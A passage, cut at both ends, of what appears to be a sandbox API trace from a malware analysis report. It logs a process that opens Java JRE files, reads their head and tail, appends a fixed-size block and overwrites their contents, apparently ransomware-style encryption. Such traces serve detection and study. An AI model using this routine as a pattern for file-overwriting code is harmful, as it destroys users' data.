returned 0x0 [0128.343] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1e55, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x359f2d0*=0x1e55, lpOverlapped=0x0) returned 1 [0128.343] CloseHandle (hObject=0x1f0) returned 1 [0128.343] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0128.344] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.344] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x449777 [0128.344] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.344] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.344] ReleaseMutex (hMutex=0x168) returned 1 [0128.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deploy.jar", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deploy.jar", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="deploy.jar", lpUsedDefaultChar=0x0) returned 10 [0128.344] ReadFile (in: hFile=0x1f0, lpBuffer=0x289e978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.948] ReadFile (in: hFile=0x1f0, lpBuffer=0x289e978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.950] ReadFile (in: hFile=0x1f0, lpBuffer=0x289e978, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0128.954] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x447777 [0128.954] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0128.956] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x447777 [0128.956] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0128.957] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0128.957] WriteFile (in: hFile=0x1f0, lpBuffer=0x28c5ea8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28c5ea8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.957] WriteFile (in: hFile=0x1f0, lpBuffer=0x28c5ea8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28c5ea8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.958] WriteFile (in: hFile=0x1f0, lpBuffer=0x28c5ea8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28c5ea8*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0128.958] CloseHandle (hObject=0x1f0) returned 1 [0128.958] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunmscapi.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0128.959] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.959] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x77e7 [0128.959] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.959] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.959] ReleaseMutex (hMutex=0x168) returned 1 [0128.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunmscapi.jar", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunmscapi.jar", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunmscapi.jar", lpUsedDefaultChar=0x0) returned 13 [0128.959] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.961] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x67e7 [0128.961] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.962] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x67e7 [0128.962] WriteFile (in: hFile=0x1f0, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.962] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0128.963] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0128.963] CloseHandle (hObject=0x1f0) returned 1 [0128.963] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightitalic.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0128.964] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.964] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x13bd8 [0128.964] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.964] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.965] ReleaseMutex (hMutex=0x168) returned 1 [0128.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightItalic.ttf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0128.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightItalic.ttf", cchWideChar=22, lpMultiByteStr=0x1f88d34, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaBrightItalic.ttf", lpUsedDefaultChar=0x0) returned 22 [0128.965] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0128.966] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x12bd8 [0128.967] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.968] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x12bd8 [0128.968] WriteFile (in: hFile=0x1f0, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.969] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0128.969] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0128.969] CloseHandle (hObject=0x1f0) returned 1 [0128.969] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\invalid32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0128.970] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.970] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x99 [0128.970] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.970] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.970] ReleaseMutex (hMutex=0x168) returned 1 [0128.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="invalid32x32.gif", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0128.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="invalid32x32.gif", cchWideChar=16, lpMultiByteStr=0x1f88d34, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invalid32x32.gif", lpUsedDefaultChar=0x0) returned 16 [0128.970] ReadFile (in: hFile=0x1f0, lpBuffer=0x262f5b8, nNumberOfBytesToRead=0x99, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x262f5b8*, lpNumberOfBytesRead=0x359f2bc*=0x99, lpOverlapped=0x0) returned 1 [0128.971] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0128.971] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x621, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x621, lpOverlapped=0x0) returned 1 [0128.972] CloseHandle (hObject=0x1f0) returned 1 [0128.972] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javaws.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0128.973] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.973] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xd9d17 [0128.973] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.973] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.973] ReleaseMutex (hMutex=0x168) returned 1 [0128.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.jar", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.jar", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javaws.jar", lpUsedDefaultChar=0x0) returned 10 [0128.973] ReadFile (in: hFile=0x1f0, lpBuffer=0x289e978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x1f0, lpBuffer=0x289e978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.980] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xd8d17 [0128.980] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.984] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xd8d17 [0128.985] WriteFile (in: hFile=0x1f0, lpBuffer=0x2866f58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.986] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0128.986] WriteFile (in: hFile=0x1f0, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.986] WriteFile (in: hFile=0x1f0, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0128.986] CloseHandle (hObject=0x1f0) returned 1 [0128.987] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\logging.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\logging.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0128.987] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.988] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x997 [0128.988] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.988] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.988] ReleaseMutex (hMutex=0x168) returned 1 [0128.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logging.properties", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0128.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logging.properties", cchWideChar=18, lpMultiByteStr=0x1f88d34, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="logging.properties", lpUsedDefaultChar=0x0) returned 18 [0128.988] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0x997, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x359f2bc*=0x997, lpOverlapped=0x0) returned 1 [0128.991] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0128.991] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xf1f, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x359f2d0*=0xf1f, lpOverlapped=0x0) returned 1 [0128.991] CloseHandle (hObject=0x1f0) returned 1 [0128.991] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\plugin.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0128.996] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.996] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1d5e98 [0128.996] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.997] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.997] ReleaseMutex (hMutex=0x168) returned 1 [0128.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="plugin.jar", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="plugin.jar", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="plugin.jar", lpUsedDefaultChar=0x0) returned 10 [0128.997] ReadFile (in: hFile=0x1f0, lpBuffer=0x289e978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0129.001] ReadFile (in: hFile=0x1f0, lpBuffer=0x289e978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0129.419] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1d4e98 [0129.420] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0129.422] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1d4e98 [0129.422] WriteFile (in: hFile=0x1f0, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0129.423] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0129.424] WriteFile (in: hFile=0x1f0, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0129.424] WriteFile (in: hFile=0x1f0, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0129.424] CloseHandle (hObject=0x1f0) returned 1 [0129.424] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.security" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.security"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0129.426] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.426] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x45a0 [0129.426] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.426] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.426] ReleaseMutex (hMutex=0x168) returned 1 [0129.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.security", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.security", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java.security", lpUsedDefaultChar=0x0) returned 13 [0129.426] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0129.428] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x35a0 [0129.428] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0129.429] SetFilePointer (in: 